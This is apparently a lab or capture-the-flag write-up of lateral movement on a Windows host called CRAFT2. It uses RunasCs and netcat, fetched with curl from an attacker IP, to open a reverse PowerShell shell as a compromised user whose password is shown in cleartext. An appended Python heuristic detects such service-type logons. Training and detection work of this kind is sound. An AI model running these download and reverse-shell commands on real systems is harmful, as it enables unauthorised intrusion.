thecybergeek
Attempting lateral movement to the thecybergeek user, whose credentials were already compromised, after performing manual enumeration on the CRAFT2 host.
PS C:\tmp> net user thecybergeek
User name thecybergeek
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/5/2022 9:22:54 AM
Password expires Never
Password changeable 4/5/2022 9:22:54 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/4/2025 10:59:01 AM
Logon hours allowed All
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
Although a WinRM service is running, it cannot be used because the thecybergeek user is not a member of the Remote Management Users group.
PS C:\tmp> curl http://192.168.45.158/RunasCs.exe -OutFile .\RunasCs.exe
PS C:\tmp> .\RunasCs.exe "thecybergeek" winniethepooh "cmd /c whoami"
[*] Warning: The logon for user 'thecybergeek' is limited. Use the flag combination --bypass-uac and --logon-type '5' to obtain a more privileged token.
craft2\thecybergeek
PS C:\tmp> .\RunasCs.exe "thecybergeek" winniethepooh "cmd /c whoami" --bypass-uac --logon-type 5
craft2\thecybergeek
However, I can use RunasCs.exe instead.
PS C:\tmp> curl http://192.168.45.158/nc64.exe -OutFile .\nc64.exe
Transferring a Netcat binary.
PS C:\tmp> .\RunasCs.exe "thecybergeek" winniethepooh "cmd /c C:\tmp\nc64.exe 192.168.45.158 6666 -e powershell"
[*] Warning: The logon for user 'thecybergeek' is limited. Use the flag combination --bypass-uac and --logon-type '5' to obtain a more privileged token.
Executing Netcat
The --bypass-uac --logon-type 5 flags are REMOVED because they limit the user.
Lateral movement to the thecybergeek user achieved by leveraging RunasCs.exe.
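From the defender's side, the RunasCs warning above is the useful detail: a "more privileged token" via logon type 5 means a service-type logon requested by an ordinary user process. As an added example that is not part of the original writeup or of RunasCs, the Python check below applies that heuristic to constructed Windows Security 4624 records (field names as in the 4624 event; the "webuser" account, the sample paths and the records themselves are assumptions).

```python
from dataclasses import dataclass

# Subset of the Windows Security event 4624 fields used by this check.
@dataclass
class LogonEvent:
    subject_user: str    # SubjectUserName: account that requested the logon
    target_user: str     # TargetUserName: account that was logged on
    logon_type: int      # LogonType: 2 Interactive, 3 Network, 5 Service, ...
    process_name: str    # ProcessName: process that requested the logon

# Built-in accounts that legitimately request service logons.
SYSTEM_ACCOUNTS = {"SYSTEM", "LOCAL SERVICE", "NETWORK SERVICE"}

def is_suspicious_service_logon(ev: LogonEvent) -> bool:
    """Heuristic: a type-5 (service) logon is normally requested by SYSTEM from
    services.exe when the service control manager starts a service. One requested
    by an ordinary user account, from any other process, is what a runas-style
    tool producing a service token looks like and deserves review."""
    if ev.logon_type != 5:
        return False
    if ev.subject_user.upper() in SYSTEM_ACCOUNTS:
        return False
    caller = ev.process_name.rsplit("\\", 1)[-1].lower()
    return caller != "services.exe"

def review(events):
    """Return the target account of every event the heuristic flags."""
    return [ev.target_user for ev in events if is_suspicious_service_logon(ev)]

# Constructed sample records (not taken from any real log); "webuser" stands in
# for whichever account the attacker's PowerShell prompt was running as.
SAMPLE_EVENTS = [
    LogonEvent("SYSTEM", "NETWORK SERVICE", 5, r"C:\Windows\System32\services.exe"),
    LogonEvent("webuser", "thecybergeek", 5, r"C:\tmp\RunasCs.exe"),
    LogonEvent("webuser", "thecybergeek", 2, r"C:\Windows\System32\svchost.exe"),
    LogonEvent("alice", "alice", 3, r"C:\Windows\System32\lsass.exe"),
]

if __name__ == "__main__":
    for user in review(SAMPLE_EVENTS):
        print(f"review: service logon for {user} not requested by the SCM")
```

Pair this with the 4688 process-creation record of the requesting process; a binary in a writable directory such as C:\tmp requesting a service logon is the combination worth an alert.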